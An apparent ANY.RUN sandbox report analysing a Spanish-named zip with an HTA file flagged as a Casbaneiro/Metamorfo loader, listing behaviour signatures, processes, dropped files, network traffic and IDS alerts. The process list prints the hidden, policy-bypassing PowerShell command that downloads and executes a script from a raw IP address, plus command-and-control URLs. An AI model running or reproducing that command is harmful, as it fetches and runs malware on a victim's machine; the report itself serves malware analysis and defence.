File name:

Adjuntos04-Junio.PDF-TJBNKHP.zip

Full analysis: https://app.any.run/tasks/b759071e-9cbf-40c8-ad68-876e28b5850b
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: June 04, 2024, 20:25:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
casbaneiro
metamorfo
uac
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

82003AA5C6D6E08678709848218B85B2

SHA1:

A03407FBFCE6CBB7052C14311C53252F13A53AB0

SHA256:

12DF42601CCD2DF232BF3667E1E12F8B11D79F55D9787AE9A824694A4ECE4AF2

SSDEEP:

12:5jn4K3HxatsaS09HpljpBCgAhL9cG1LTB56LgNe4HjIDEBTkBHXGNennbMAcnFkG:9nH3HIWC3ADTB5NNeKTgGinEnFkUm0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1424)

    • Changes powershell execution policy (Bypass)

      • mshta.exe (PID: 1756)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1424)

    • Request from PowerShell that ran from MSHTA.EXE

      • powershell.exe (PID: 1424)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)

    • Modifies registry (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2252)

    • Connects to the CnC server

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)

    • Create files in the Startup directory

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)

    • CASBANEIRO has been detected (SURICATA)

      • powershell.exe (PID: 1424)

    • Bypass User Account Control (Modify registry)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)

    • Drops the executable file immediately after the start

      • powershell.exe (PID: 2208)

  • SUSPICIOUS

    • Reads the Internet Settings

      • rundll32.exe (PID: 4072)
      • mshta.exe (PID: 1756)
      • powershell.exe (PID: 1424)
      • sipnotify.exe (PID: 2044)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • sipnotify.exe (PID: 1888)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)

    • Found IP address in command line

      • powershell.exe (PID: 1424)

    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 1756)
      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2180)
      • cmd.exe (PID: 2120)

    • Probably download files using WebClient

      • mshta.exe (PID: 1756)

    • Possibly malicious use of IEX has been detected

      • mshta.exe (PID: 1756)

    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 1756)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2252)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)

    • Connects to the server without a host name

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)

    • Contacting a server suspected of hosting an CnC

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)

    • The system shut down or reboot

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)

    • The process executes via Task Scheduler

      • sipnotify.exe (PID: 2044)
      • ctfmon.exe (PID: 1692)
      • ctfmon.exe (PID: 1596)
      • sipnotify.exe (PID: 1888)

    • Changes default file association

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)

    • Likely accesses (executes) a file from the Public directory

      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2120)
      • cmd.exe (PID: 2180)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2120)
      • cmd.exe (PID: 2180)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2180)
      • cmd.exe (PID: 2120)

    • Application launched itself

      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2180)
      • cmd.exe (PID: 2120)

    • Reads settings of System Certificates

      • sipnotify.exe (PID: 2044)
      • sipnotify.exe (PID: 1888)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)

    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 2208)

    • The process drops C-runtime libraries

      • powershell.exe (PID: 2208)

    • Process drops legitimate windows executable

      • powershell.exe (PID: 2208)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2208)

  • INFO

    • Manual execution by a user

      • notepad.exe (PID: 124)
      • rundll32.exe (PID: 4072)
      • notepad.exe (PID: 1872)
      • notepad.exe (PID: 2040)
      • mshta.exe (PID: 1756)
      • wmpnscfg.exe (PID: 1932)
      • IMEKLMG.EXE (PID: 2136)
      • IMEKLMG.EXE (PID: 2128)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2156)
      • wmpnscfg.exe (PID: 2736)
      • wmpnscfg.exe (PID: 2764)
      • IMEKLMG.EXE (PID: 2104)
      • IMEKLMG.EXE (PID: 2096)
      • cmd.exe (PID: 2120)
      • cmd.exe (PID: 2180)
      • _uhcrtd3_Yi7.exe (PID: 2140)
      • wmpnscfg.exe (PID: 2808)
      • wmpnscfg.exe (PID: 2784)

    • Reads security settings of Internet Explorer

      • rundll32.exe (PID: 4072)
      • sipnotify.exe (PID: 2044)
      • sipnotify.exe (PID: 1888)

    • Checks proxy server information

      • mshta.exe (PID: 1756)

    • Checks supported languages

      • wmpnscfg.exe (PID: 1932)
      • IMEKLMG.EXE (PID: 2128)
      • IMEKLMG.EXE (PID: 2136)
      • wmpnscfg.exe (PID: 2736)
      • wmpnscfg.exe (PID: 2764)
      • IMEKLMG.EXE (PID: 2096)
      • IMEKLMG.EXE (PID: 2104)
      • _uhcrtd3_Yi7.exe (PID: 2140)
      • wmpnscfg.exe (PID: 2784)
      • wmpnscfg.exe (PID: 2808)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 1756)

    • Disables trace logs

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2252)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)

    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)

    • Reads the computer name

      • wmpnscfg.exe (PID: 1932)
      • IMEKLMG.EXE (PID: 2128)
      • IMEKLMG.EXE (PID: 2136)
      • wmpnscfg.exe (PID: 2764)
      • wmpnscfg.exe (PID: 2736)
      • IMEKLMG.EXE (PID: 2104)
      • IMEKLMG.EXE (PID: 2096)
      • _uhcrtd3_Yi7.exe (PID: 2140)
      • wmpnscfg.exe (PID: 2784)
      • wmpnscfg.exe (PID: 2808)

    • Process checks whether UAC notifications are on

      • IMEKLMG.EXE (PID: 2128)
      • IMEKLMG.EXE (PID: 2136)
      • IMEKLMG.EXE (PID: 2104)
      • IMEKLMG.EXE (PID: 2096)

    • Reads the software policy settings

      • sipnotify.exe (PID: 2044)
      • sipnotify.exe (PID: 1888)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0002
ZipCompression: Deflated
ZipModifyDate: 2024:06:04 17:36:52
ZipCRC: 0x85adba13
ZipCompressedSize: 520
ZipUncompressedSize: 1120
ZipFileName: Adjuntos04-Junio.PDF-TJBNKHP.hta
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
172
Monitored processes
36
Malicious processes
9
Suspicious processes
3

Behavior graph

Click at the process to see the details
start winrar.exe no specs rundll32.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs mshta.exe #CASBANEIRO powershell.exe wmpnscfg.exe no specs shutdown.exe no specs ctfmon.exe no specs sipnotify.exe imeklmg.exe no specs imeklmg.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs cmd.exe no specs powershell.exe wmpnscfg.exe no specs wmpnscfg.exe no specs shutdown.exe no specs ctfmon.exe no specs sipnotify.exe imeklmg.exe no specs imeklmg.exe no specs cmd.exe no specs _uhcrtd3_yi7.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe powershell.exe wmpnscfg.exe no specs wmpnscfg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
124"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\Adjuntos04-Junio.PDF-TJBNKHP.htaC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
1200"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\Adjuntos04-Junio.PDF-TJBNKHP.htaC:\Windows\System32\notepad.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
1212"C:\Windows\system32\shutdown.exe" /r /t 15C:\Windows\System32\shutdown.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Shutdown and Annotation Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\shutdown.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\secur32.dll
1424"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (new-object net.webclient).downloadstring('http://94.131.117.72/ldvb/pw')"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1596C:\Windows\System32\ctfmon.exe C:\Windows\System32\ctfmon.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CTF Loader
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ctfmon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msctfmonitor.dll
c:\windows\system32\msctf.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
1692C:\Windows\System32\ctfmon.exe C:\Windows\System32\ctfmon.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CTF Loader
Exit code:
1073807364
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ctfmon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msctfmonitor.dll
c:\windows\system32\msctf.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
1756"C:\Windows\System32\mshta.exe" "C:\Users\admin\Desktop\Adjuntos04-Junio.PDF-TJBNKHP.hta" C:\Windows\System32\mshta.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
1872"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\Adjuntos04-Junio.PDF-TJBNKHP.htaC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
1888C:\Windows\system32\sipnotify.exe -LogonOrUnlockC:\Windows\System32\sipnotify.exe
taskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
sipnotify
Exit code:
0
Version:
6.1.7602.20480 (win7sp1_ldr_escrow.191010-1716)
Modules
Images
c:\windows\system32\sipnotify.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1932"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
43 806
Read events
43 482
Write events
287
Delete events
37

Modification events

(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3968) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Adjuntos04-Junio.PDF-TJBNKHP.zip
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
Executable files
6
Suspicious files
24
Text files
24
Unknown types
3

Dropped files

PID
Process
Filename
Type
3968WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3968.10349\Adjuntos04-Junio.PDF-TJBNKHP.htahtml
MD5:8A309B30AEB277EB7A2363484EBE804C
SHA256:C4068F41C6301757FE23051F7B4B4312FB0CFBA3BC618725297CAC803875AD78
3968WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3968.11125\Adjuntos04-Junio.PDF-TJBNKHP.htahtml
MD5:8A309B30AEB277EB7A2363484EBE804C
SHA256:C4068F41C6301757FE23051F7B4B4312FB0CFBA3BC618725297CAC803875AD78
1424powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_dcpgky3_H.lnklnk
MD5:3A108A7761EEA26A9D4B6D089AF234F6
SHA256:E0788EC623FE8179341E75B34BC4A8E215CDAE15C48F66681D7E085787C9C5A4
1424powershell.exeC:\users\public\USER-PC_dcpgky3_H.cmdtext
MD5:9FA1754C03684ADD2F1317071460E448
SHA256:64C97EB830AC01D67F7C732EF35601DBA32CA831909FB0456CC7FCADD2C9C69F
1424powershell.exeC:\_dcpgky3_H\USER-PC_dcpgky3_Htext
MD5:F33BB3F1B71C05FC8DAA3B0908BE3DCA
SHA256:EBDA232FC01D4837B77EC30597945B103B45245714A6FE6AFE0D198010F21195
1424powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_dcpgky3_HAA.lnklnk
MD5:E8C4A48495A8741F4C4D3CA77AA9E812
SHA256:3E80267167AA0CBC78125BF5F01DD56712A4F839B01E9DBB213D177D6A0596BC
1424powershell.exeC:\_dcpgky3_H\USER-PC_dcpgky3_Hytext
MD5:9C2D3D09140EEEB2EFE40F876D44E1B0
SHA256:72B3480265246FB30775BD6C6DF814C48D07FF8A2AF3CD3BB28AC61119D88734
1424powershell.exeC:\users\public\USER-PC_dcpgky3_Hy.cmdtext
MD5:B413EB5015261C32E1A9AA55E600095F
SHA256:DCA65B434D4238F75EF155C1CD668A60E21DEF515FBE9699D7478BD6FDD2C739
1424powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_dcpgky3_Hy.lnklnk
MD5:B4FD7691CFB396BB4FBEC931BBC63558
SHA256:FDE793C0F0B180A14125FE0F342391A2B8513E0A3FF89DB03D6B25E61F6FF87B
1424powershell.exeC:\users\public\L21text
MD5:4F983E0A4F63B6E6FBFC52A387A66CBF
SHA256:0432CC95843F7A506114B7643C41796B7DE5A6864D926C91636644554F71788E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
38
DNS requests
12
Threats
14

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1424
powershell.exe
GET
200
94.131.117.72:80
http://94.131.117.72/ldvb/pw
unknown
unknown
GET
200
94.131.117.72:80
http://94.131.117.72/ldvb/0105
unknown
unknown
2044
sipnotify.exe
HEAD
200
88.221.61.151:80
http://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE2JgkA?v=133620100584530000
unknown
unknown
1424
powershell.exe
POST
200
94.131.117.72:80
http://94.131.117.72/ldht/index.php
unknown
unknown
2044
sipnotify.exe
HEAD
200
88.221.61.151:80
http://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE2JgkA?v=133620101195930000
unknown
unknown
1392
svchost.exe
GET
304
217.20.57.18:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?59c6d662c26e01b9
unknown
unknown
1392
svchost.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
1072
svchost.exe
GET
304
217.20.57.18:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?90423d3b50428e59
unknown
unknown
1392
svchost.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
2208
powershell.exe
POST
200
86.38.217.167:80
http://86.38.217.167/ps1/index.php
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1088
svchost.exe
224.0.0.252:5355
unknown
1756
mshta.exe
94.131.117.72:80
ZAYO-6461
US
unknown
1424
powershell.exe
94.131.117.72:80
ZAYO-6461
US
unknown
1100
svchost.exe
224.0.0.252:5355
unknown
1460
svchost.exe
239.255.255.250:3702
unknown
2044
sipnotify.exe
88.221.61.151:80
query.prod.cms.rt.microsoft.com
AKAMAI-AS
DE
unknown
2208
powershell.exe
93.127.200.211:443
fsnat.shop
diva-e Datacenters GmbH
DE
unknown
2448
powershell.exe
93.127.200.211:443
fsnat.shop
diva-e Datacenters GmbH
DE
unknown

DNS requests

Domain
IP
Reputation
query.prod.cms.rt.microsoft.com
  • 88.221.61.151
whitelisted
fsnat.shop
  • 93.127.200.211
unknown
firebasestorage.googleapis.com
  • 142.250.181.234
  • 216.58.206.42
  • 172.217.16.138
  • 142.250.186.106
  • 142.250.185.202
  • 172.217.16.202
  • 142.250.184.234
  • 142.250.74.202
  • 142.250.185.234
  • 142.250.184.202
  • 142.250.186.74
  • 142.250.186.42
  • 172.217.18.10
  • 142.250.186.170
  • 216.58.206.74
  • 142.250.185.170
whitelisted
config.messenger.msn.com
  • 64.4.26.155
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
ctldl.windowsupdate.com
  • 217.20.57.18
  • 217.20.57.34
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted

Threats

PID
Process
Class
Message
1424
powershell.exe
Potentially Bad Traffic
SUSPICIOUS [ANY.RUN] Get-WmiObject Cmdlet was detected
1424
powershell.exe
A Network Trojan was detected
LOADER [ANY.RUN] Casbaneiro Server Response (Metamorfo)
1424
powershell.exe
A suspicious string was detected
SUSPICIOUS [ANY.RUN] Decoding FromBase64 HTTP URI String
1424
powershell.exe
A Network Trojan was detected
ET MALWARE Horabot Payload Inbound
2208
powershell.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to connect to TLS FireBase Storage
1756
mshta.exe
A Network Trojan was detected
SUSPICIOUS [ANY.RUN] VBS is used to run Shell
1756
mshta.exe
Potentially Bad Traffic
ET HUNTING PowerShell DownloadString Command Common In Powershell Stagers
7 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Adjuntos04-Junio.PDF-TJBNKHP.zip